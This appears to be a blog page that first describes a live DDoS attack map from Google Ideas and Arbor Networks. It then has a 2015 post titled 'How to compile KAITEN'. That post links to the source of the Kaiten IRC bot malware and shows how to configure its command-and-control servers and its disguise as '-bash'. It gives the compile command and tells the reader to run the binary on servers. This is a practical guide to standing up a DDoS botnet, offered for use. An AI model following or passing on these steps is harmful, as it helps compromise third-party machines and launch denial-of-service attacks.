Live Ddos View

Live DDoS Attack Map | Apakau

Live DDoS Attack Map

This map is the fruit of collaboration between Google Ideas and Arbor Networks in an effort to raise awareness about distributed denial of service attacks in the world everyday.

Exploring the Data

The Digital Attack Map displays global DDoS activity on any given day. Attacks are displayed as dotted lines, scaled to size, and placed according to the source and destination countries of the attack traffic when known. Some features include:

  • Use the histogram at the bottom of the map to explore historical data.
  • Select a country to view DDoS activity to or from that country.
  • Use the color option to view attacks by class, duration, or source/destination port.
  • Use the news section to find online reports of attack activity from a specified time.
  • View the gallery to explore some examples of days with notable DDoS attacks.

Sign Up

Friday, June 19, 2015

How to compile KAITEN

Note : Do this after setting up an IRC Server

First you need the script : https://packetstormsecurity.com/files/25575/kaiten.c.html

Then Configure the script to your settings by editing the kaiten.c file

only configure this part: this is my example

Code:
////////////////////////////////////////////////////////////////////////////////
// EDIT THESE //
////////////////////////////////////////////////////////////////////////////////
#undef STARTUP // Start on startup?
#undef IDENT // Only enable this if you absolutely have to
#define FAKENAME "-bash" // What you want this to hide as
#define CHAN "#hi" // Channel to join
#define KEY "" // The key of the channel
int numservers=4; // Must change this to equal number of servers down there
char *servers[] = { // List the servers in that format, always end in (void*)0
"YOUR.IRC.SERVER",
"",
"",
"",
(void*)0
};
////////////////////////////////////////////////////////////////////////////////
// STOP HERE! //
////////////////////////////////////////////////////////////////////////////////
now after configuring that to your liking
compile the c script into a binary by typing this command

Code:
gcc -o outputname kaiten.c
Now just execute outputname on servers....

No comments:

Post a Comment